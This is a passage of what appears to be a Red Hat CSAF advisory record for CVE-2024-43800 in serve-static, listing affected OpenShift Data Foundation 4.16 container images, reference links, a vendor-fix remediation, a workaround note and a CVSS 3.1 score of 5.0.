"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", 